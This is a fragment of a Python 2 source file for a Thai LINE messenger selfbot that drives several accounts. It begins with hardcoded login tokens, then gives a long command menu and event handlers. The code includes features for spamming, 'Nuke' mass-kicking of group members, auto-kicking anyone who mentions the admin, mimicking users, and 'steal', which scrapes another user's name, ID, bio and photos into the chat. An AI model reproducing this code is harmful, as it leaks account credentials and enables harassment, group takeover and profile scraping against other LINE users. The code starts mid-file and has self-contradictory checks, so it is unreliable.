ki3 = LINETCR.LINE()
ki3.login(token="Epezl3XFYfIArh9F82x6.SGby4XQI1gAOTET1lBqQ9G.Kha8WacxePkq1eck0Kaxb83kSJ4odJGyVV9aMSvEspI=")
print "ki3 login success"
ki4 = LINETCR.LINE()
ki4.login(token="EpUfPCc0QdIkGkErgJca.Q6+YE7DHLRb+4/UXmbKggG.LJL7TYkXyf5UpTvXGKBFSmyYPQJAz9cgbzl5bsKJBJI=")
print "ki4 login success"
ki5 = LINETCR.LINE()
ki5.login(token="Epyyzy4CVbNqz8DSept8.7fLTCfOW6V77bikOdoT16a.QFITEuKTLXnmPlJ6XX43+Oe3oF3jKsLCE4JFL/mwOcA=")
print "ki5 login success"
ki6 = LINETCR.LINE()
ki6.login(token="EpPC6mLG2zwhDQo5Vx0d.2zlXNOJh2/W1Z19qm0HVpq.1KpNIxthj+z/VqsRGk5q7Yg99BKSdL8ZrC7t2SSmPHE=")
print "ki6 login success"
reload(sys)
sys.setdefaultencoding('utf-8')
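# Thai command list replied for the "Help" / "คำสั่ง" commands.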
helpMessage =""" •─ ͜͡✫-[✭] ༺ πနးຫຮี่のีধ์͜͡ ༻[✭]- ͜͡✫─•
👻 คำสั่ง ➠ ดูคำสั่ง
👻 คำสั่ง2 ➠ ดูคำสั่ง2
👻 ทักเข้า ➠ เช็คข้อความทักเข้า
👻 ทักออก ➠ เช็คข้อความทักออก
👻 ทักลบ ➠ เช็คข้อความทักคนลบ
👻 ทักเข้า: +ข้อความ ➠ ตั้งทักเข้า
👻 ทักออก: +ข้อความ ➠ ตั้งทักคนออก
👻 ทักลบ: +ข้อความ ➠ ตั้งทักคนลบ
👻 แท็ก1 ➠ เช็คข้อความแท็ก
👻 แท็ก2 ➠ เช็คข้อความแท็ก
👻 แท็ก1: +ข้อความ ➠ ตั้งแท็ก
👻 แท็ก2: +ข้อความ ➠ ตั้งแท็ก
👻 Message set:: +ข้อความ ➠ ตั้งข้อความ
👻 Help set:: +ข้อความ ➠ ตั้งข้อความ
👻 Pesan add- ➠ เพิ่มข้อความ
👻 เช็คข้อความแอด ➠ เช็คตั้งข้อความแอด
👻 Change ➠ ยกเลิกการตั้งข้อความ
👻 Message set ➠ ข้อความ
👻 Come Set: ➠ ตั้งคอมเม้น
👻 Com ➠ เช็คคอมเม้น
👻 me ➠ คทเรา
👻 ผู้สร้าง ➠ ผู้สร้างบอท
👻 midเรา ➠ เช็คเราเรา
👻 1-6mid ➠ เช็คmidคลิ้ก
👻 คลิ้กmid ➠ เช็คmidคลิ้ก
👻 ชื่อ: +ข้อความ ➠ เปลี่ยนชื่อคลิ้ก
👻 เช็คออน์ ➠ เช็คเวลาทำงานบอท
👻 ตัส: +ข้อความ ➠ ตั้งตัสคลิ้ก
👻 ชื่อเรา: +ข้อความ ➠ เปลี่ยนชื่อเรา
👻 1-6ชื่อ: +ข้อความ ➠ เปลี่ยนชื่อคลิ้ก
👻 ตัสเรา: +ข้อความ ➠ เปลี่ยนตัสเรา
👻 บอท ➠ คทคลิ้ก
👻5-6ตัส: +ข้อความ ➠ เปลี่ยนตัสคลิ้กตัว5-6
👻 1-6 ➠ เช็คคลิ้ก
👻 Mid: +mid ➠ g=H88mmid
👻 kick +mid ➠ ลบโดยmid
👻 เช็ค: +mid ➠ เชิญโดยmid
👻 Me ➠ เช็คเซล
👻 กำ ➠ เช็คเซล
👻 5555 ➠ เช็คเซล
👻 Sp ➠ เช็คสปีด
👻 respon ➠ เช็คเซล
👻 Bot? ➠ เช็คเซล
👻 บอทเข้า ➠ สั่งคลิ้กเข้า
👻 เข้า3-6 ➠ คลิ้ก3-6เข้า
👻 1-6เข้า ➠ คลิ้กเข้า
👻 ออก ➠ คลิ้กออก
👻 1-6ออก ➠ สั่งคลิ้กออก
👻 #leave ➠ ออกแชทรวม
👻 คนอ่าน ➠ ดูคนอ่าน
👻 Name me ➠ ชื่อ
👻 Copy @ ➠ คัดลอก
👻 backup ➠ คืนร่าง
👻 Tx: +ข้อความ ➠
👻 Fancytext:: +ข้อความ ➠
👻 Spam on +เลข+ข้อความ ➠ รันข้อความ
👻 มอง ➠ รายชื่ออ่าน
👻 tag all ➠ แท็ก
👻 เช็คอ่าน ➠ เช็คระบบอ่าน
👻 Gbroadcast +ข้อความ ➠
👻 Cbroadcast +ข้อความ ➠
👻 Nuke ➠ บิน
👻 Bye @ ➠ ลบ
👻 Nk @ ➠ เตะ
👻 blocklist ➠ เช็ครายการบล็อค
👻 kill ➠ ลบบชดำ
👻 ข้อมูลบัญชีดำ ➠ เช็คข้อมูลบัญชีดำ
👻 ล้างดำ ➠ ล้างบชดำ
👻 banlist ➠ เช็ครายการดำ
👻 เช็คดำ ➠ เช็ครายการดำ
👻 ขาวคท ➠ ทำขาวโดยคท
👻 ดำคท ➠ ทำดำโดยคท
👻 ขาว: ➠ ทำขาว
👻 ดำ1: ➠ ทำดำ
👻 ขาว @ ➠ ทำขาว
👻 ดำ @ ➠ ทำดำ
👻 Group cancelall ➠ ยกเลิกห้องรัน
👻 รายละเอียดกลุ่ม ➠ เช็ครายละเอียดกลุ่ม
👻 เช็คidกลุ่ม ➠ เช็คGIDกลุ่ม
👻 เช็คกลุ่ม ➠ เช็ครายการกลุ่ม
👻 Cancel ➠ ยกเลิกค้างเชิญ
👻 ยกเลิกเชิญ ➠ ยกเลิกค้างเชิญ
👻 ลบแชทบอท ➠ ลบแชทคลิ้ก
👻 l-7ลบรัน ➠ ลบรันคลิ้ก
👻 url ➠ ขอลิ้งค์ห้อง
👻 update ➠ ปรับเวลา
👻 ตั้งเวลา: +เลข ➠ ตั้งเวลา
👻 ชื่อวลาปิด ➠ ปิดชื่อมีเวลา
👻 ชื่อเวลาเปิด ➠ เปิดชื่อมีเวลา
👻 1ลิ้งค์กลุ่ม ➠ ขอลิ้งค์ห้อง
👻 2ลิ้งค์กลุ่ม ➠ ขอลิ้งค์ห้อง
👻 ลิ้งค์+ ➠ ขอลิ้งค์ห้อง
👻 Gn +ข้อความ ➠ เปลี่ยนชื่อห้อง
👻 ชื่อกลุ่ม: +ข้อความ ➠ เปลี่ยนชื่อห้อง
👻 ของขวัญ ➠ ให้ของขวัญ
👻 1-4ของขวัญ ➠ ให้ของขวัญ
👻 Mimic target ➠ เลียนแบบ
👻 เช็คพูดตาม ➠ เช็ครายชื่อคนพูดตาม
👻 ลบพูดตาม @ ➠ ลบที่เพิ่มพูดตาม
👻 พูดตาม @ ➠ เพิ่มคนพูดตาม
👻 lurkers ➠ อ่านแบบแทก
👻 lurk off ➠ ปิดอ่าน
👻 lurk on ➠ เปิดอ่าน
👻 อ่าน ➠ เแดดูชื่อคนอ่าน
👻 Set2 ➠ เช็คตั้งค่า
👻 Set1 ➠ เช็คตั้งค่า
👻 ปิดหมด ➠ ปิดระบบกัหมด
👻 เปิดหมด ➠ เปิดระบบหมด
👻 ปิดลิ้งค์ ➠ ปิดลิ้งค์กลุ่ม
👻 เปิดลิ้งค์ ➠ เปิดลิ้งค์กลุ่ม
👻 กันยกเลิก1ปิด ➠ ปิดการยันเลิก
👻 กันยกเลิก1เปิด ➠ เปิดกันยกเลิก
👻 ปิดเเจ้งเตือนบอท ➠ ปิดเเจ้งเตือนบอท
👻 เปิดเเจ้งเตือนบอท ➠ เปิดเเจ้งเตือนบอท
👻 ปิดแจ้งเตือน ➠ ปิดระบบแจ้งเตือน
👻 เปิดแจ้งเตือน ➠ เปิดระบบแจ้งเตือน
👻 คอมเม้นปิด ➠ ปิดระบบคอมเม้น
👻 คอมเม้นเปิด ➠ เปิดระบบคอมเม้น
👻 แอดปิด ➠ ออโต้แอดปิด
👻 แอดเปิด ➠ ออโต้แอดเปิด
👻 แชร์ปิด ➠ เช็คลิ้งค์โพสปิด
👻 แชร์เปิด ➠ เช็คลิ้งค์โพสเปิด
👻 Group cancel: off ➠ ปิดระบบกินห้องรัน
👻 Group cancel: on ➠ เปิดระบบกินห้องรัน
👻 ออกแชทรวมปิด ➠ ปิดออกจากแชทรวม
👻 ออกแชทรวมเปิด ➠ เปิดออกจากแชทรวม
👻 เข้าออโต้ปิด ➠ ปิดการเข้าออโต้
👻 เข้าออโต้เปิด ➠ เปิดการเข้าออโต้
👻 กันยกเลิกปิด ➠ ปิดระบบกันยกเลิก
👻 กันยกเลิกเปิด ➠ เปิดระบบกันยกเลิก
👻 กันเชิญปิด ➠ ปิดระบบกันเชิญ
👻 กันเชิญเปิด ➠ เปิดระบบกันเชิญ
👻 กันลิ้งค์ปิด ➠ ปิดระบบกันลิ้งค์
👻 กันลิ้งค์เปิด ➠ เปิดระบบกันลิ้งค์
👻 ป้องกันปิด ➠ ปิดระบบกันลบ
👻 ป้องกันเปิด ➠ เปิดระบบกันลบ
👻 เช็คคทปิด ➠ ปิดอ่านคท
👻 เช็คคทเปิด ➠ เปิดอ่านคท
👻 ทักลบเปิด ➠ เปิดรับละลบ
👻 ทักลบปิด ➠ ปิดทักละลบ
👻 ทักออกปิด ➠ ปิดระบบทักคนออก
👻 ทักออกเปิด ➠ เปิดระบบทัดคนออก
👻 ต้อนรับปิด ➠ ปิดระบบทักเข้า
👻 ต้อนรับเปิด ➠ เปิดระบบทักเข้า
👻 เตะแท็กเปิด ➠ เปิดระบบเตะคนแท็ก
👻 เตะแท็กปิด ➠ ปิดระบบเตะคนแท็ก
👻 แท็กปิด ➠ ปิดระบบแท็ก
👻 แท็กเปิด ➠ เปิดระบบแท็ก
👻 อ่านปิด ➠ ปิดระบบอ่าน
👻 อ่านเปิด ➠ เปิดระบบอ่าน
👻 ปิดอ่าน ➠ ปิดระบบอ่าน
👻 เปิดอ่าน ➠ เปิดระบบอ่าน
👻 TL: ➠ โพส
•─ ͜͡✫-[✭] ༺ πနးຫຮี่のีধ์͜͡ ༻[✭]- ͜͡✫─•
"""
helpMessage2 ="""👻 .11 ➠
👻 T say ➠
👻 Me ban ➠
👻 Banlistall ➠
👻 Mban: ➠
👻 Com Bl cek ➠
👻 Com hapus Bl ➠
👻 Com Bl ➠
👻 Sayang say ➠
👻 Welcome ➠
👻 Say ➠
👻 ping ➠
👻 cancel ➠
👻 Beb @ ➠
👻 Cek @ ➠
👻 Telan @ ➠
👻 Bunuh @ ➠
👻 ☜ʕ•ﻌ•ʔ ➠
👻 [Auto] ➠
👻 พูด ➠
👻 siri-en ➠
👻 siri: ➠
👻 siri ➠
👻 Ry20 ➠
─────┅═ইई═┅─────
╔══════════════════
║ ✦โหมดเช็คตั้งค่าข้อความ✦
╠══════════════════
║✰ Hhx1 ➠เช็คข้อความต้อนรับ
║✰ Hhx2 ➠เช็คข้อความคนออก
║✰ Hhx3 ➠เช็คข้อความคนลบ
╠════════════════
║•─ ͜͡✫-[✭] ༺ πနးຫຮี่のีধ์͜͡ ༻[✭]- ͜͡✫─•
╚════════════════
"""
helo=""
KAC=[cl]
mid = cl.getProfile().mid
kimid = ki.getProfile().mid
ki2mid = ki2.getProfile().mid
ki3mid = ki3.getProfile().mid
ki4mid = ki4.getProfile().mid
ki5mid = ki5.getProfile().mid
ki6mid = ki6.getProfile().mid
mid = cl.getProfile().mid
Bots = ["u7a4febc4c650fc7679eadf4245c2a5ad"]
self = ["u7a4febc4c650fc7679eadf4245c2a5ad"]
admin = ["u7a4febc4c650fc7679eadf4245c2a5ad"]
owner = ["u7a4febc4c650fc7679eadf4245c2a5ad"]
Creator = ["u7a4febc4c650fc7679eadf4245c2a5ad"]
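# Global feature toggles and per-feature state; the chat commands below flip
# these flags (auto join, protections, greetings, blacklists, ...).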
wait = {
"alwayRead":False,
"detectMention":True,
"kickMention":False,
"steal":False,
'pap':{},
'invite':{},
"spam":{},
'contact':False,
'autoJoin':True,
'autoCancel':{"on":False, "members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':False,
'message':"•─ ͜͡✫-[✭] ༺ πနးຫຮี่のีধ์͜͡ ༻[✭]- ͜͡✫─•",
"lang":"JP",
"comment":"AutoLike by •─ ͜͡✫-[✭] ༺ πနးຫຮี่のีধ์͜͡ ༻[✭]- ͜͡✫─•",
"commentOn":False,
"acommentOn":False,
"bcommentOn":False,
"ccommentOn":False,
"Protectcancl":False,
"pautoJoin":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"",
"likeOn":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"ainvite":False,
"binvite":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
"Hhx1":False,
"Hhx2":False,
"Hhx3":False,
"Notifed":False,
"Notifedbot":False,
"atjointicket":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"tag1":"แท็กทำไมหรือ",
"tag2":"จะแท็กทำไม",
"posts":False,
}
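# Read-point / who-read tracking and timer state used by the read ("อ่าน") and
# lurk commands.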
wait2 = {
"readPoint":{},
"readMember":{},
"setTime":{},
"ROM":{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def sendImageWithUrl(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
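# Scrape a YouTube search results page and return a list of youtu.be links.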
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
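# Helpers that pull image URLs ("ou" fields of rg_meta blocks) out of a raw
# Google Images results page.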
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
def upload_tempimage(client):
'''
Upload the image at the module-level image_path to the module-level album using the given imgur client (both must be defined before this is called).
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
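# Build one message that @-mentions every name in `nama` by filling LINE's
# MENTION contentMetadata with start/end offsets for each "@x" placeholder.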
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
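# Format an elapsed time in seconds as "HH Jam MM Menit SS Detik".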
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_, text=None, contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M2 = self._client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImage2(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = cl.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
messageReq = {}
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
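# Main operation handler: called for every polled operation and dispatches
# group events (invite/join/leave/kick, protections) and chat commands.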
def bot(op):
try:
if op.type == 0:
return
if op.type == 13:
if op.param2 in Bots + admin:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
G = cl.getGroup(op.param1)
ginfo = cl.getGroup(op.param1)
G.preventJoinByTicket = False
invsend = 0
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = False
cl.sendText(op.param1,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 15:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "ไปแร้วสะละ\n เเล้วพบกันใหม่นะ ")
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + " ☜ʕ•ﻌ•ʔ ")
cl.sendText(op.param1, " ยินดีต้อนรับครับ \n สวัสดีครับผม \n อย่าลืมปิดเสียงการเเจ้งเตือนด้วยนะ \n\n[By. ༺ πနးຫຮี่のีধ์͜͡ ༻]")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 15:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n Bye~bye ")
ki2.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n Bye~bye ")
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n•─ ͜͡✫-[✭] ༺ πနးຫຮี่のีধ์͜͡ ༻[✭]- ͜͡✫─•")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
ki2.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 15:
if wait["bcommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["bcomment"]))
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["acommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["acomment"]))
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["ccommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["ccomment"]))
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.param3 == "1":
if op.param1 in wait["pro_name"]:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
if op.type == 13:
if wait["Protectcancl"] == True:
if op.param2 not in Bots:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"URL/QRが更新されました.☆(´・ω・`)\n時間 [⏰] ")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"❇BY ༺ πနးຫຮี่のีধ์͜͡ ༻️ [⏰] ")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"❇️ มีการเชิญสมาชิกเข้าร่วมกลุ่ม ❇️ [⏰] ")
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[contact.mid for contact in cl.getGroup(op.param1).invitee])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[contact.mid for contact in cl.getGroup(op.param1).invitee])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
except:
pass
elif op.param2 not in admin + Bots:
random.choice(KAC).sendText(op.param1,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
pass
# Op program in Admin and User Comment By Googlez #
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"ᴄᴏᴍᴘʟᴇᴛᴇ ᴀʟʀᴇᴀᴅʏ")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"ɴᴏᴛ ᴛᴏ ᴄᴏᴍᴍᴇɴᴛ")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"ᴅᴇʟᴇᴛᴇ ʙʟᴀᴄᴋʟɪsᴛ ᴄᴏᴍᴘʟᴇᴛᴇ")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"ᴅᴇʟᴇᴛᴇ ʙʟᴀᴄᴋʟɪsᴛ ᴄᴏᴍᴘʟᴇᴛᴇ")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"ᴄᴏᴍᴘʟᴇᴛᴇ ᴀʟʀᴇᴀᴅʏ")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"ᴄᴏᴍᴘʟᴇᴛᴇ ᴀʟʀᴇᴀᴅʏ")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"ᴅᴇʟᴇᴛᴇ ʙʟᴀᴄᴋʟɪsᴛ ᴄᴏᴍᴘʟᴇᴛᴇ")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"ɴᴏ ʙʟᴀᴄᴋʟɪsᴛ ᴜsᴇʀ")
if 'MENTION' in msg.contentMetadata.keys():
if wait["kickMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["จุกไมละมึง By. ༺ πနးຫຮี่のีধ์͜͡ ༻" + cName]
ret_ = random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in admin:
cl.sendText(msg.to,ret_)
random.choice(KAC).kickoutFromGroup(msg.to,[msg.from_])
break
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
random.choice(KAC).kickoutFromGroup(msg.to,[msg.from_])
break
if 'MENTION' in msg.contentMetadata.keys():
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = [cName + "\n" + str(wait["tag1"]) , cName + "\n" + str(wait["tag2"])]
ret_ = random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
break
if msg.contentType == 13:
if wait["steal"] == True:
_name = msg.contentMetadata["displayName"]
copy = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
print "[Target] Stealed"
break
else:
targets.append(copy)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
